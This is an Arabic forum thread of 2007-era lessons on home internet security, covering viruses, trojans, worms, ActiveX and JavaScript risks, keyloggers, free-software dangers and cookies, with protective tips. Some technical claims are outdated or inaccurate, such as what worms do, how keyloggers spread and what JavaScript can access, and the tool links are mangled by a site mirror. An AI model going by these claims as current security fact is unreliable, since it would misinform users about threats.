الله هو الحامي و الحارس اولا و اخيرا .. لنفرض انك خرجت من منزلك هل ستعطي كل من تواجهه بياناتك هل ستضع لافته على صدرك بإسمك و بياناتك الشخصية. كلا . !! بالطبع لا .. هل يمكنك عمل ما تريد من غير الخوف من المتطفلين كلا .. إذا بمجرد دخولك على الشبكة اعتبر نفسك خرجت من بيتك .. وتخيل نفسك في وسط ميدان كبير مزدحم بالناس و الكثير من الفضوليين..هذا هو الحال عن دخولك للشبكة اعتبر نفسك خارج منزلك..! لا تترك اي بيانات او صور شخصية على جهازك.. هذه الاشياء مكانها الاقراص المرنه لهذا وجدت !!!
كثير من برامج الحماية من الفايروسات تعامل اليوم ملفات التجسس او حصان طرواده ( نسبة إلى حصان طرواده الشهير الذي ارسل إلى الحصن و كان السبب في سقوطه) فايروسات و تستطيع الكشف عنها ..
هناك برامج اخرى تستخدم فقط للحماية من التجسس مثل:
+LookDown2000 (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://freehosting2.at.webjump.com/li/liwa-webjump/program/Lockdown2000.exe%5Cn%5CnThis%20file%20was%20not%20 retrieved%20by%20Teleport%20Pro,%20because%20it%20 is%20addressed%20on%20a%20domain%20or%20path%20out side%20the%20boundaries%20set%20for%20its%20Starti ng%20Address.%5Cn%5CnDo%20you%20want%20to%20open%2 0it%20from%20the%20server?%27%29%29window.location =%27http://freehosting2.at.webjump.com/li/liwa-webjump/program/Lockdown2000.exe%27)
+NetBuster (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.netbus.com/files/netbuster.zip%5Cn%5CnThis%20file%20was%20not%20ret rieved%20by%20Teleport%20Pro,%20because%20it%20is% 20addressed%20on%20a%20domain%20or%20path%20outsid e%20the%20boundaries%20set%20for%20its%20Starting% 20Address.%5Cn%5CnDo%20you%20want%20to%20open%20it %20from%20the%20server?%27%29%29window.location=%2 7http://www.netbus.com/files/netbuster.zip%27)
+IntruderAlert\'99 (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.bonzi.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.bonzi.com/%27).
لا يمكن تحديد مدى فعالية البرامج السابقة و هناك تضارب في الآراء حول مدى فعاليتها .. كما يقال انها على العكس تماما تسهل عملية الإختراق لكن يبقى الامر مثارا للجدل.
كما تجنب الآتي:
+لا تفتح أي ملف يصلك عبر البريد الإلكتروني مهما كان إلا إذا كنت تعرف مصدره .. و تعرف ما هو .
+لا تحمل أي برامج من اي مكان كان و لا تستقبل البرامج عبر برامج الحوار .كون هذه الملفات في الغالب تكون مصاحبه لكثير من البرامج .

Linux Root
, Tue, 26 Jun 2007 23:05:56 +0200
الدرس العشرين
أمن الرسائل الإلكترونية
E-Mail Security
في عالم الإنترنت هناك الكثير من مصادر التهديد لأمن معلوماتك و جهازك ، و تعتبر الرسائل الإلكترونية أحد البوابات الكبيرة التي تسمح لتلك المصادر بالدخول إلى جهازك كما أنها تعتبر أسرع وسيلة لنشر برامج الأشرار من فيروسات و ديديان و برامج لتعطيل عمل الشبكات أو برامج تجسس لأن البريد الإلكتروني سريع الانتقال و منتشر بين الناس و كذلك لسهولة إضافة أي نوع من الملفات الملحقة بالرسالة




مصادر التهديد الأمني في الرسائل الإلكترونية

Linux Root
, Tue, 26 Jun 2007 23:10:09 +0200
الدرس الواحد والعشرين

الأمن على شبكة الإنترنت



بين كل فترة وأخرى تسمع عن هجمات الفيروسات ومدى الدمار الذي سببته على الأجهزة ، كما نسمع عن تسلل أحد المتطفلين الى قاعدة معلومات عسكرية أو منشات حكومية ونسمع عن مجرمي التقنية الحديثة الذين يستخدمون أرقام بطاقات الإئتمان بعد رصدها من شبكة الإنترنت أو بعد اختراقهم لأجهزة بعض المستخدمين كما نسمع عن هؤلاء الذين يتسللون إلى شبكات البنوك والشركات الكبرى !! كل ذلك بسبب عدم الأخذ ببديهيات الأمن أو لضعف الاجراءات الأمنية المتخذه ونتج عن ذلك خسائر تقدر بمئات الملايين ولكن الأمور الان أصبحت أكثر صرامة و صعوبة أمام المخترقين و المتطفلين خاصة بعد سن القوانين التي تجرم من يقوم بتلك الأفعال وتطور مستوى البحث والتحري لتتبع أثر المجرمين على الشبكة ، كما لا ننسى أنها أيضا نتيجة مباشرة لزيادة الوعي لدى الشركات والبنوك بأهمية الأمن ولذلك فإن هؤلاء المتطفلين والمجرمين بدأوا بالبحث عن مستخدمين عاديين لأنهم أهداف أبسط ولا يأخذ منهم وقت طويل للوصول الى أجهزتهم ومعلوماتهم ولذلك يخطئ الان من يقول (إن المتسللين والمجرمين يبحثون عن البنوك والشركات الكبرى ولا يبحثون عن شخص عادي مثلى !) وذلك للسبب الذي ذكر أعلاه كما نود أن نذكر بأن هناك فئه من الناس مريضة بحب التطفل والتجسس على الناس ولذلك فهم يستهدفون أجهزة الأفراد ومن ثم ينشرون الصور الشخصية أو العائلية المخزنة و بقيةالمعلومات التي حصلوا عليها على شبكة الإنترنت و كذلك هناك من الإرهابيين أو المجرمين ممن يريدون ارسال رسائل تهديد أو فيروسات فيقومون باستخدام جهازك دون علمك وقبل أن تشعر بهم و من ثم يضعوك أنت في وجه المدفع أمام الجهات الرسمية ، وهذا ماحصل قبل عدة أشهر عندما قام بعض الأشخاص بتعطيل أشهر المواقع الأمريكية مثل ياهوو و أمازون دوت كوم وذلك بتسخير مئات من الكمبيوترات المملوكة للجامعات وبعض الشركات والأفراد لارسال كميات مهوله من المعلومات والطلبات حتى تعطلت المواقع وشلت الحركة بها تماما أمام المستخدمين و تسبب في خسائر تقدر بمئات الملايين من الدولارات
الفرق بين مفهوم الأمن و حماية الخصوصية على شبكة الإنترنت


في البداية قد تخلط بين المفهومين كما يخلط بقية الناس ولكن دعوني أشرح لكم الفرق ، بإختصار جدا حماية الخصوصية لمستخدم شبكة الإنترنت هي جزء من الأمن على الشبكة ولكن الأمن ليس بالضرورة جزء من حماية الخصوصية‍، وبشكل اخر فإن مفهوم الأمن على الشبكة هو قيامك بعدة خطوات أو ترتيبات فعالة لحماية جهازك ومعلوماتك الهامة وحماية الخصوصية تعتبر جزء من هذه الترتيبات الأمنية المتخذه لسلامة جهازك ومعلوماتك

أمثلة عملية


على مسألة الخصوصية: مثلا قيام المواقع وشركات الدعاية والإعلان على الشبكة بتتبع نشاطك وإحصاء المواقع المفضلة لديك ومدة تصفحك للإنترنت واوقات دخولك وخروجك من الشبكة ورصد جميع المواقع الأخرى التي تقع في دائرة إهتماماتك وهذا طبعا يعتبر تعدي على الخصوصية

مسألة الأمن: لو وصلتك رسالة الكترونية و بها ملفات ملحقة وقمت بفتح الملف وكان بها نوع من الفيروسات فهذا سوف يصيب جهازك و أجهزة من تقوم بمراسلتهم وتحتفظ بعناوينهم البريدية في أحد البرامج وهذا بالطبع مسألة أمن بالدرجة الأولى

مثال على موضوع الخصوصية و الأمن في نفس الوقت

لو قام أحدهم بتتبعك على الإنترنت وأستطاع الحصول على بعض معلوماتك الشخصية ومنها رقم بطاقة الإئتمان وإساءة إستخدامها فهذا التتبع يعتبر إنتهاك للخصوصية وفي نفس الوقت هو موضوع متعلق بأمن جهازك ومعلوماتك المخزنة فيها


مصادر التهديد الأمني لمستخدمي شبكة الإ نترنت



أولا : الفيروسات
ثانيا: أحصنة طروادة وديدان الإنترنت
ثالثا: الاختراق (سواء كان اختراق لشبكة حاسب أو جهاز شخصي) وتعرف ب الهاكينج
رابعا: الجافا سكريبت و الجافا ابليت و الأكتف إكس
خامسا: جواسيس البريد الإلكتروني
سادسا: راصدي لوحة المفاتيح
سابعا: مصادر تهديد للخصوصية ولكنها قد تهدد الأمن مثل: كعكة الإنترنت و مصادر متعلقه بالبريد الإلكتروني مثل المحولين(رفيرر) و المزعجين(سبامرز) وغيرهم

وإليك شرح مبسط عن كل منها علما بأننا سوف نقوم بتحديث وإضافة كل جديد فتابع معنا في هذا الموقع

الفيروسات
هي برامج صغيرة تصيب الأجهزة وتتسبب في الكثير من المشاكل كمسح الذاكرة الصلبة أو مسح بعض الملفات الهامة في أنظمة التشغيل أو القيام باصدار الأوامر لبعض البرامج دون علمك أو تدخل مباشر منك مثل ما عمل فيروس الحب قبل عدة أشهر ، و لمزيد من المعلومات عن أنواع الفيروسات وكيفية عمل البرامج المضادة لها يرجى زيارة الصفحة الخاصة التالية
الفيروسات و البرامج المضادة لها


طرق العدوى بالفيروسات

تعتبر الرسائل الإلكترونية أكبر مصدر للفيروسات وذلك لسهولة إضافتها كملفات ملحقة وسرعة انتشارها على الشبكة في زمن قصير جدا، وتعتبر نسخ البرامج المقلدة مصدرا اًخر للفيروسات. أما المصدر الأقل انتشارا فهي الأقراص اللينة ولكنها أخطر
بكثير من المصادر الأخرى وذلك لتعاملها المباشر مع نظام بدء التشغيل لجهازك

اما أحصنة طروادة وديدان الإنترنت فهي شبيهة جدا بالفيروسات ولكنها تختلف في الهدف فمثلا الديدان تقوم بمسح أو تدمير المعلومات من البرامج التطبيقية كبرامج المحاسبة وقواعد المعلومات فقط كما أن بمقدور هذه الديدان التكاثر حتى تملأ الذاكرة و تعطل الجهاز الضحية، أما أحصنة طروادة فهي لا تدمر ولا تمسح المعلومات ولكنها تتجسس وتقوم بجمع المعلومات والبيانات ومن ثم ارسالها لمصدرها (مرسل برنامج حصان طروادة) وهو عادة ما يكون فرد أو موقع أو منظمة لجمع المعلومات

(Hacking)الاختراق

هو قيام شخص أو أكثر بمحاولة الوصول الى جهازك أو الشبكة الخاصة بشركتك عن طريق شبكة الإنترنت وذلك باستخدام برامج متخصصة(سكانرز) في فك الرموز والكلمات السرية وكسر الحواجز الأمنية واستكشاف مواطن الضعف في جهازك أو شبكة معلوماتك وعادة ما تكون المخارج (بوابات العبور للمعلومات ) الخاصة بالشبكة المحلية ، وهذه أسهل الطرق للوصول إلى جميع ملفاتك وبرامجك
وبالنسبة للمخترقين أصبحت المهمة عسيرة بعض الشئ وذلك في اختراق المؤسسات والمواقع الكبيرة بعد تطور نظم الدفاع وبرامج الحماية،ولكن بالنسبة لأجهزة الأفراد مازالت الأبواب مفتوحة وهي كما يقول المثل المصري (وكالة من غير بواب !!!) ولذلك تابع معنا في هذا الموقع حتى تتعلم كيف تحمي نفسك

جافا سكريبت و جافاأبليتس والأكتف إكس
وكلها تقنيات حديثة ومفيدة ولكن تهدد أمن المستخدمين علما بأن الأخيرتين تعتبر أساسا من الأدوات المهمة جدا لتصميم المواقع الحديثة ولكن سوء استخدام هذه التكنولوجيا يهدد مستقبلها ومدى انتشار شعبيتها، وذلك لقيام العديد من المستخدمين المتمرسين بتعطيل هذه الخاصية من المتصفح الخاص بهم وبالتالى العزوف عن المواقع المصممة على أساس هذه التكنولوجيا مما يؤدي الى فقدان شريحة كبيرة من المستخدمين لأنها مصدر خطير جدا على الأمن و عادة تقوم المواقع المشبوهه و العائدة ملكيتها لأحد المحتالين باستخدام هذه التقنية بكثرة لأنها قادرة على رصد كلمات السر والعبور وكذلك تدمير وتعديل الملفات المخزنة أو ملفات البرامج ولهذا السبب تتجنب معظم المواقع العالمية الإفراط فيها بينما يقوم اصحاب المواقع الشخصية باستخدامها بكثرة ليظهروا قدراتهم أمام الأصدقاء و الزملاء بحسن نية ، و نحن بدورنا لم نقم بإستخدام هذه التقنيات الحديثة وتجنبناها على قدر المستطاع و لمزيد من المعلومات يرجى الإطلاع على
صفحة البرامج ذاتية التحميل


جواسيس البريد الإلكتروني: وهم عادة من المخترقين السابقين لجهازك أو ممن يشاركونك الجهاز فعليا سواءا في المنزل أو العمل أو مستخدم اخر للجهاز خاصة إذا كنت في مقهى للإنترنت ولم تخرج من برنامج البريد بشكل صحيح أو لم تقم بالخروج من برنامج المتصفح و لمزيد من المعلومات يرجى مراجعة المقالة خاصة عن أمن البريد الإلكتروني

راصدي لوحة المفاتيح: وهم من أخطر مصادر التهديد الأمني حيث أنهم قادرين على رصد أي ضغطة على لوحة المفاتيح وبذلك يتمكنون من رصد كل ما يتم كتابته على لوحة المفاتيح خاصة اسم المستخدم وكلمات العبور وذلك حتى قبل أن يتمكن جهازك أو برنامجك من اخفاء و تشفير الكلمة ولحسن الحظ فإن هذه البرامج غير منتشرة عبر الشبكة لأنها تتطلب الوصول الى جهازك فعليا ، و يكثر استخدام هذه البرامج من قبل النساء (الزوجات) لمراقبة دردشة الأزواج على الشبكة ! كما يستخدمها بعض ضعاف النفوس لرصد معلومات الغير في مقاهي الإنترنت والأجهزة العامة في المكتبات وغيرها من الاماكن ولذلك يتردد الكثير من المستخدمين ممن يعتمدون على الأجهزة العامة كمقاهي الإنترنت (و لا يمتلكون أجهزة خاصة بهم) من الشراء المباشر من الإنترنت و استخدام بطاقات الائتمان ويفضلون التحويل البنكي أو الاتصال لإملاء الرقم بالهاتف أما اذا كنت تتسوق من جهازك الخاص فلا داعي للقلق و ننصح بقراءة المقالة الخاصة عن أمن التجارة الإلكترونية في موقعنا


الوقاية خير من العلاج


هذه الحكمة البليغة خير معين لك لكي تحافظ على جهازك ومعلوماتك عندما تكون على شبكة الإنترنت وحتى تستطيع أن تتخيل الموقف عليك بمعاملة موضوع حماية الخصوصية والأمن في الإنترنت تماما كما تتعامل مع الموضوعين في المنزل فمثلا في البيت أنت تحمي خصوصيتك بعدة طرق منها أن تضع الستائر على النوافذ أو أن تغلق النوافذ والأبواب الخارجية لمنع أي شخص من الدخول إلى المنزل أو القيام بسرقة أي شئ ، وكذلك إذا أردت مزيد من الخصوصية تقوم بإغلاق باب حجرتك وإذا أردت إخفاء شئ تقوم بوضعه داخل صندوق و كذلك في الإنترنت عليك القيام بنفس الشئ فمثلا : إذا أردت حماية خصوصيتك عليك أن تسدل الستار على تحركاتك وتصفحك وإذا أردت المزيد من الخصوصية عليك بوضع الأرقام السرية وكلمات العبور لجهازك وإذا أردت حماية نفسك من اللصوص في ا لإنترنت عليك القيام بغلق الباب امامهم. تخيل ان سور المنزل هو جهازك وباب منزلك الخارجي في الإنترنت هو نظام التشغيل وباب شقتك هو انظمة أو ملفات المشاركة (نت ورك) التي تجعلك قادر على العمل كعنصر من شبكة حاسبات اًلية متصلة مع بعضها البعض و باب غرفتك هو المتصفح الخاص بالإنترنت ، وبالتأكيد إذا لم يسبق لك الإعداد لحماية نفسك وجهازك سوف تندهش بعد أن تقرأ مقالتنا القادمة (في نفس هذه الصفحة) حول الإجراءات الوقائية لأمن وحماية الخصوصية لأنك سوف تكتشف بأنك كنت تنام وباب المنزل مفتوح وكذلك باب الشقة وكذلك باب الغرفة وستائر النافذة غير مسدله !!! فتابع معنا


خطوات و اجراءات بسيطة ولكنها تغلق الأبواب وتحميك

في هذة المقالة سوف نذكر لك عدة إجراءات بسيطة وعادات مفيدة تتعود عليها اثناء تصفحك للإنترنت ، علما بأن هذه الإجراءات لا تغنيك عن إقتناء برنامج حماية متخصص ولكنها كافيه لكي تبدأ ببناء خط دفاعي أول و قوي يصعب من مهمة اللصوص والمتطفلين خاصة اذا كنت تعمل من جهاز شخصي متصل بالإنترنت عن طريق مودم أما إذا كنت متصل بالإنترنت بطريقة أسرع كالخطوط الرقمية فأنت بحاجة فورية لبرنامج متخصص للحماية والسبب هو حصولك على رقم أي بي(عنوان بروتوكول الإنترنت) ثابت مخصص لك مما يسهل عملية تتبعك على الإنترنت أما لو كنت تستخدم فاكس مودم عادي للإتصال بالإنترنت فإن مزود الخدمة لا يخصص لك رقم أي بي محدد ولكنك تحصل على رقم مختلف كلما قمت بالإتصال على الشبكة. أما لو كنت تملك شبكة من الكمبيوترات المتصلة مع بعضها البعض وجهازك يعتبر جزء من هذه الشبكة المتصلة بالإنترنت فإنك بحاجة فورية لبرنامج حماية متخصص(جدران اللهب) وذلك لأن المخارج المخصصة لمشاركة الملفات تكون مفتوحة و جاهزة لاي هاكر
اتبع هذه النصائح لزيادة مستوي الأمن

أولا : اشتري نسخة أصلية وحديثة من نظام التشغيل وذلك لأن نظام التشغيل هو أساس الحماية وفي نفس الوقت يمكن أن يكون أكبر نقطه ضعف في جهازك و في الحقيقة تقوم الشركات المنتجة لأنظمة التشغيل بتحديث وتعديل هذه الأنظمة كلما يتم إكتشاف خلل أمني وعادة يتم إخبارك بالبريد الإلكتروني أو يتم ذلك بطريقة مباشرة من خلال ارتباطك المباشر بالشركة المنتجة أو زيارة موقع الشركة والبحث عن التحديثات و من ثم تنزيل الملفات الخاصة بالتحسينات على نظام التشغيل وعادة لا يتمتع من يملك نسخة مقلدة من هذه الميزة وأنا أشبه من لا يمتلك نسخة أصلية من نظام التشغيل كمن يشتري فيلا فاخرة ويستعير قفل الباب من الجيران

ثانيا : قم بتنزيل أحدث نسخة(اصدار) من المتصفح وذلك لأن الاصدارات القديمة بها العديد من الثقوب الأمنية والتي تجعل منك هدفا سهلا وطبعا إذا كنت ممن يشترون من خلال الشبكة احصل على نسخة مدعومه بقوة تشفير 128 بت، كما ننصح بتعديل مستوى الأمن في المتصفح وذلك بمنع وتعطيل التشغيل المباشر لأكتف إكس و جافا و جافا سكريبت

LAN ثالثا : التحكم بملفات المشاركة المحلية
إذا كنت تملك نظام تشغيل ويندوز ولست متصل بشبكة حاسبات اًلية داخل المكتب او المنزل أي انك لست بحاجة إلى أي نوع من أنواع الملفات الخاصة بالمشاركة قم بمسح وإزالة أي نوع من ملفات المشاركة لأن نظام ويندوز يقوم بفتح هذه الملفات بطريقة مباشرة كشيء أساسي في النظام و تعتبر هذه الملفات أكبر مصدر تهديد أمني لك لأنها تسمح لأي شخص في الإنترنت من الدخول إلى جهازك ومشاركتك في ملفاتك ومعلوماتك الموجودة فى الجهاز

رابعا : احمي جهازك بكلمة مرور تمنع الاخرين من الدخول إلى جهازك . فهناك عدة كلمات عبور يمكنك انشاءها في جهازك فمثلا يمكنك وضع كلمة عبور على جهازك لايمكن لأي أحد غيرك من تشغيل أو استخدام الجهاز إلا بعد كتابتها ، وهنالك كلمة عبور في نظام التشغيل وندوز 98-95 ولكنها غير مجدية وتحتاج لكثر من الجهد حتى يمكن برمجتها وجعلها مفيدة أما مستخدمي وندوز إن تي فيمكنهم التمتع بميزة كلمة العبور ، وهنالك أيضا كلمة عبور يمكن وضعها إذا كنت متصل بشبكة معينة حيث لا يتم الاتصال إلا بعد ادخالها

خامسا : عليك بنسخة أصلية وحديثة من برنامج مضاد للفيروسات وأقول أصلية لأنك سوف تتمتع بخدمة مجانية وغالبا ما تكون لمدة عام وهي خدمة التحديث المباشر من موقع الشركة المنتجة وهذا غير متوفر للنسخ المقلدة واحرص على تجديد وتحديث نسختك كل اسبوع أو عشرة ايام وذلك لظهور فيروسات جديدة أو نسخ معدلة من فيروسات قديمة كل يوم

سادسا : تجنب تنزيل أو تحميل أي برامج أو ملفات ذات طبيعة تنفيذية خاصة من مصادر غير موثوق بها

سابعا : تجنب فتح الملفات المرفقة في الرسائل الإلكترونية من مصادر غير معروفة لديك وخاصة إذا كانت من نوع

.exe ,.com and .bat

ثامنا : تجنب تنزيل أي برامج مجانية (إذا لم تكن من مواقع معروفة وذات سمعة بالحفاظ على الخصوصية وكذلك تجنب تنزيل البرامج من مصادر الأخبار الجماعية وهو ما يعرف ب
News Group
لأن الكثير من الهاكرز يتخفون تحت مظلة هذه البرامج للوصول الى جهازك

تاسعا : إذا كنت تملك معلومات في غاية الأهمية أو خاصة جدا ، قم باستخدام أي برنامج لتشفير معلوماتك ورسائلك الإلكترونية

عاشرا : لا تقم بأي عملية شراء من شبكة الإنترنت دون التأكد من استخدام سيرفر اًمن و وجود علامة القفل المغلق في المتصفح وكذلك تغير
http:// to https://
وهنا تلاحظ وجود حرف (إس) زيادة مما يعني انك تستخدم بروتوكول امن لنقل المعلومات ولكن عليك بالتأكد من أنك تستخدم قوة تشفير 128 بت وذلك لتوفير الأمان اللازم ويمكنك التأكد من قوة التشفير في متصفحك (انترنت إكسبلورر) وذلك بالنقر على
Help
وهو موجود على الجانب الأيسر من شاشة المتصفح في أعلى الصفحة
ومن ثم اختيار
About Internet Explorer
وسوف تجد كلمة
Cipher 128 bit
فإن لم تجد هذا الرقم ، قم قم بتنزيل نسخة جديدة من موقع ويندوز

حادي عشر : تجنب الموافقة على حفظ اسم المستخدم وكلمات العبور في أي وقت لأنك لو وافقت على ذلك فسوف تسهل العملية على الهاكرز لأنه سوف يجدها مخزنة و جاهزة له

تحذير لا تسمح لأي كان خاصة من موقع شخصي أو غير متخصص باجراء تجربة على جهازك ومسح المنافذ المفتوحة فهناك العديد من الهاكرز يتخفون تحت هذا القناع ويخدعونك بهذه الحيلة لتنزيل برامج التجسس والتعرف على نقاط الضعف في جهازك أو شبكتك
و يمكنك الإطلاع على مقالة مختصر الكلام لإستخدام الشبكة بسلام

Linux Root
, Tue, 26 Jun 2007 23:16:46 +0200
الدرس الثاني والعشرين

خدعوك فقالوا برامج مجانية من الإنترنت


كثير من الأحيان تجد مواقع تقدم لك برامج مجانية و تطلب منك انزال وتحميل هذه البرامج وهي تقوم بذلك لعدة اسباب منها على سبيل المثال: تجربة المنتج على أرض الواقع و استخدام جهازك كحقل للتجارب ! أو يكون بها ملف مرفق يتم عن طريقه التجسس عليك و جمع المعلومات أو فتح منافذ في جهازك لنقل المعلومات المخزنه بها و مهما تعدت الأسباب فكل الذي عليك هو توخي الحيطة و الحذر من تلك البرامج خاصة اذا كانت من مواقع شخصية و غير معروفة و لا تقوم بإتباع سياسات واضحة و محددة لحماية الخصوصية أو تحتوي على برامج مجهولة المصدر و لكنها وضعت في ذلك الموقع عن طريق احد الأشخاص المجهولين. ولقد لاحظنا وجود العديد من المواقع الغير معروفة و التي تطلب منك عبر رسائل تصلك بالبريد الإلكتروني وتدعوك بان تقوم بتجربة قدرة أحد برامجهم على اكتشاف العيوب أو المنافذ الأمنية المفتوحة في جهازك مجانا أو القيام بتنزيل برنامج لكي تجسس على غيرك ولكن سوف تكتشف سريعا بأنك أنت أول الضحايا
و لذلك لا تثق بهؤلاء و عليك ان تفكر دائما بهذا السؤال لماذا يقدم هذا الشخص هذا البرنامج أو غيره بالمجان ودون مقابل؟ هناك قاعدة ذهبية في الإنترنت ( لا يوجد شئ من دون مقابل !) قد يكون له مقابل و لكنك لا تشعر بهذا المقابل وجدير بالذكر أن هناك الكثير من الهاكرز يتخفون تحت هذه البرامج المجانية و يجدون متعة كبيرة في الإيقاع بالضحايا
وننصح بعدم انزال تلك البرامج من أي موقع شخصي و غير معروف و حتى المواقع المعروفة تقول لك في اتفاقية الإنزال بأنها لا تتحمل أي أضرار ناتجة عن إستخدام هذه البرامج وأنها تحت مسؤوليتك بالكامل

وحتى لا تظلم الجميع يوجد عدد قليل جدا من المواقع المحترمة و التي تسمح لك بتحميل بعض البرامج بالمجان للترويج و التعريف بالمنتج و لكن عليك بقراءة الإتفاقية و سياسة حماية الخصوصية لذلك الموقع جيدا قبل الإقدام على تحميل البرنامج

Linux Root
, Tue, 26 Jun 2007 23:22:34 +0200
الدرس الثالث والعشرين

أحصنة طروادة و البرامج ذاتية التحميل


هناك عدة برامج مصممة خصيصا للعمل في بيئة الإنترنت بحيث يتم ارسال هذه البرامج عبر الشبكة بكل سهولة و يسر و يتم تحميلها على جهازك و كأنها معلومات مرسلة اليك دون أي مشاكل أو صعوبات كما أن هذه البرامج قد صممت في الأساس لكي توفر السهولة و السرعة أثناء التصفح أو الإبحار في الشبكة و تجعل من صفحات المواقع أكثر جاذبية و حركة و لذلك تحمست الشركات المنتجة للمتصفحات و قدمت الدعم لهذه التكنولوجيا و لكن للاسف صاحب هذا الإنتشار نوع من سوء الإستخدام من قبل بعض المبرمجين و المستخدمين مما تسبب في الكثير من المشاكل الأمنية لبقية المستخدمين ، فتعالوا معنا اليوم لنتعرف سويا على هذه البرامج الخطيرة و طرق الوقاية من مشاكلها

أنواع البرامج ذاتية التحميل



برامج أكتف إكس
برامج جافا أبليتس
برامج جافا سكريبت

أكتف إكس


هذا البرنامج أحد منتجات شركة مايكروسوفت وهي عبارة عن مجموعة من المتحكمات المبرمجة بواسطة برنامج مايكروسوفت فيجوال بيسك وهي صممت أساسا لتوجيه بعض التقنيات المستخدمة لإنشاء الصفحات المتطورة جدا مثل
- Component Object Model (COM)
- Object Linking and Embedding Function (OLE)
هذه المتحكمات تمكن مصممي الصفحات من انشاء صفحات بها الكثير من الحركات و الخصائص الجذابة
أين مصدر الخطر و التهديد؟


المشكلة الحقيقية هي أن هذه المتحكمات اذا ما نزلت الى جهازك فلا يوجد حدود أو قيود لتقف عندها فهي تستطيع أن تقوم بالمهمات التالية

التحكم بنظام التشغيل في جهازك و ذلك بحذف أو تعديل الملفات
التحكم في قرصك الصلب و هذا يجعل من مهمة انزال برامج التجسس و الفيروسات أمر سهل
ارسال معلومات عن نظام التشغيل لديك و بقية المكونات الى جهاز اَخر أو جهاز خادم بعيد عنك دون معرفتك
نقل الملفات من الجهاز الى أي جهاز اَخر مما يسهل من عملية جمع المعلومات الشخصية و كلمات العبور
القدرة على تعديل مستوى الأمن في متصفحك دون علمك وبالتالي تسهيل المهمة لأي برنامج تجسس اَخر





جافا ابليتس


هي برامج صغيرة و شبيهه جدا بالأكتف اكس لدرجة أننا قد نستطيع القول بأنها نسخة شركة صن مايكروسيستمز و لها نفس مقدرات الأكتف اكس و خطورتها على أمن وخصوصية المستخدم


جافا سكريبت


هو برنامج مختلف عن الجافا أبليتس و لكنه مشابه له بالإسم و هي عبارة عن مجموعة من المتفرعات للغة الترميز اتش تي إم ايل
أين مصدر الخطر و التهديد؟


هذا البرنامج قادر على فتح و إغلاق النوافذ أتناء عملك على الشبكة و لذلك تستخدم بكثرة في برامج المحادثات المباشرة و تكمن خطورته في قدرته على تعديل خصائص المتصفح لديك و السماح بإنزال و تشغيل الجافا أبليتس دون علمك و بالتالي التمكن من قراءة القرص الصلب و نقل المعلومات من جهازك كما تتمكن هذه البرامج من التحكم بالإستمارات و الإستبيانات التي تقوم بتعبئتها

ما هو الحل ؟


لقد تنبهت جميع الشركات المنتجة للمتصفحات لخطورة الوضع وقامت بإضافة خاصية طلب الشهادة الرقمية أو التوقيع الإلكتروني لمصادر هذه البرامج بحيث تمكن المستخدم من تعطيل و الغاء التعامل مع البرامج الغير موقعة أو مجهولة المصدر كما تتمكن المتصفحات الحديثة من تعطيل و رفض هذه البرامج من الأساس

أحصنة طروادة


هي أحد البرامج التي تبدو اَمنه و مفيدة و لكنها في الحقيقة تقوم بأعمال غير مشروعة في الخفاء وذلك نتيجة لزرع أحد البرامج الذاتية التشغيل بها دون علمك ، و هناك عدة طرق و حيل يستخدمها الهاكرز لتنزيل أحصنه طروادة في أجهزة الغير بدون علمهم و منها الرسائل الإلكترونية و البطاقات الإلكترونية أو البرامج المجانية مجهولة المصدر و المواقع الشخصية و كثيرة هي المواقع الشخصية العربية التي ما أن تدخل عليها الا و تجد أن هناك برنامج يتم تحميله مباشرة و في الغالب ما يكون برنامج للتحكم بالفأرة وتغيير شكل الفأرة و أنت قد تظن بأن هذا البرنامج مفيد و غير ضار ولكن في الحقيقة هو حصان طروادة و كذلك قد يتم اغراؤك بتنزيل لعبة أو كارت الكتروني جميل أو ملف ملحق برسالة الكترونية وهو في الغالب حصان طروادة

الوقاية من احصنة طروادة


دائما و أبدا الوقاية خير من العلاج و لذلك قم بإتباع النصائح التالية

استخدام برنامج مضاد للفيروسات حديث و قم بتجديد الملفات كل فترة من الزمن
اقتناء و استخدام جدران اللهب
عدم تحميل أي برنامج مجاني مجهول المصدر و خاصة اذا كان من موقع شخصي أو من موقع مشبوه
تجنب فتح الرسائل الإلكترونية ذات المصادر الغير معروفة خاصة تلك التي تحمل ملفات مرفقة
تعديل مستوى الأمن في المتصفح بحيث لا يتم قبول نزول أي برنامج من هذه البرامج
اذا لم ترغب في منع هذه البرامج بشكل تام فيمكنك قبول البرامج التي تحمل التوقيع الإلكتروني لمصدرها

Linux Root
, Tue, 26 Jun 2007 23:25:37 +0200
الدرس الرابع والعشرين

كعكة الإنترنت هل لديك الكثير منها؟


Internet Cookies


كعكة الإنترنت هي ملف نصي صغير مكون عادة من ستة أجزاء وهي: اسم الكعكة ، قيمتها ، تاريخ انتهاء مفعولها ، اتجاهها ، الموقع المالك لها، درجة الأمان ( التشفير ) وأخيرا طبيعة المعلومات التي تقوم بجمعها. ومصدر هذه الكعكات هي المواقع التي تقوم بزيارتها أنت أثناء تجولك بالشبكة أو المواقع المتعاونه معها وهناك مصدر اُخر وهو البريد الإلكتروني الخاص بك حيث أنك وحال فتحك لأي رسالة قادمة من أي مصدر يقوم ذلك المصدر باهدائك كعكة من انتاجه ! حتى لوكان المرسل صديق لك لأن كل صفحة مرسلة لابد من احتوائها على رموز مزود الخدمة لذلك الصديق خاصة إذا كانت الرسالة من النوع المكتوب بلغة الترميز


كيف ومتى تعمل؟


بكل بساطة ما أن تزور أي موقع على شبكة الإنترنت وتدخل على أي من صفحاتها الرئيسية كانت أو الفرعية حتى يقوم ذلك الموقع باصدار نسختين من الكعكة الخاصة بهم واحدة تبقى في السيرفر الخاص بهم والأخرى يتم ارسالها لك وعادة يكرمونك بعدة كعكات حتى لاتقول عنهم بخلاء! ويقومون بارسال هذه الكعكات جاهزة ومطبوخة ولكن تنتظر منك بعض النكهات الخاصة بك حتى تكون كعكة معتبرة ومناسبة لذوقك! وذلك حال قيامك بتعبئة استمارة أو استبيان
